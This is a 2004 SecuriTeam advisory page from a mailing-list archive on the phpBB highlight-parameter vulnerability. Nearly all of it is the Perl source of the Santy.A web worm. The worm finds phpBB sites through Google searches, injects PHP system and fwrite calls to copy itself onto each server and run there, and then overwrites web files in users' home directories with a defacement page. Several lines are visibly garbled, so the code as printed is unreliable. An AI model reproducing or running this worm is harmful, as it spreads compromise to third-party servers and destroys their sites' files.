[EXPL] phpBB highlight Arbitrary File Upload (Santy.A)

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/04

Next message: SecuriTeam: "[UNIX] Hewlett Packard HP-UX ftpd Remote Buffer Overflow"

Previous message: SecuriTeam: "[UNIX] Multiple phpGroupWare Vulnerabilities (Path Disclosure, XSS, SQL Injection)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 22 Dec 2004 11:07:18 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

phpBB highlight Arbitrary File Upload (Santy.A)
------------------------------------------------------------------------

SUMMARY

A new worm called Santy.A has been propagating across the Internet using a
newly discovered vulnerability in phpBB's highlight parameter found in the
viewtopic.php file. The following exploit code can be used to test your
system for the mentioned vulnerability.

DETAILS

Exploit:
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
# -SECU <http://foldoc.doc.ic.ac.uk/foldoc/foldoc.cgi?query= For
educational purpose > For educational purpose
#
# See : http://isc.sans.org/diary.php?date=2004-12-21
# http://www.f-secure.com/v-descs/santy_a.shtml
#
#!/usr/bin/perl
use
strict;
use Socket;

sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

eval{ fork and exit; };

my $generation = x;
PayLoad() if $generation > 3;

open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3)
{
PayLoad() ;
} else {
exit;
}
}

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) .
';'/e;

my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q('
$markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) .
')%252e%2527';

while(1) {
exit if -e 'stop.it';

OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' .
str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' .
$selfFileName) . ')%252e%2527';
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}

sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}

sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all'
'&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' .
int(rand(30000)) .
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif
width=16 height=26
alt="" border=0><br>\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) {
my $u = $1;
next if $u =~ m#http://.*http://#i; # no redirects
push(@urls, $u);
}

return @urls;
}

sub GrabURL($) {
my $url = shift;
$url =~ s#^http://##i;

my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r =
"GET $resHTTP/1.0\015\012" .
"Host: $host\015\012" .
"Accept:*/*\015\012" .
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: http://" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>;
close (Server);

return $answer;
}

sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
$generation .q{.</b></ADDRESS>
</BODY></HTML>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}

sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~
/\.shtm/i or $ent =~ /\.jsp/i
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}

sub Pay Load() {

my @dirs;

eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d
for my $d (@dirs) {
DoDir($d);
}
}

ADDITIONAL INFORMATION

The information has been provided by Anonymous.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[UNIX] Hewlett Packard HP-UX ftpd Remote Buffer Overflow"

Previous message: SecuriTeam: "[UNIX] Multiple phpGroupWare Vulnerabilities (Path Disclosure, XSS, SQL Injection)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[TOOL] r57-pid-check
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... sub usage ... (Securiteam)
[TOOL] Multimap - Multithreaded Wrapper for NMap
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... concurrent NMap scans and
speed up the scan of large networks. ... Writes the results to an HTML file ...
sub getDate { ... (Securiteam)
[NEWS] Apple OSX Fetchmail Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Apple OSX Fetchmail Buffer
Overflow ... alarm $timeout; ... sub ERR ... (Securiteam)
[EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A remote command execution
vulnerability has been discovered in the I-Mall ... sub intro { ... chomp
$host; ... (Securiteam)
[TOOL] WebRoot - Web Server Brute Forcer
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... CIRT.DK WebRoot is a Webserver
auditing tools, ... # cpan> install Bundle::LWP ... sub ChkUpdates ...
(Securiteam)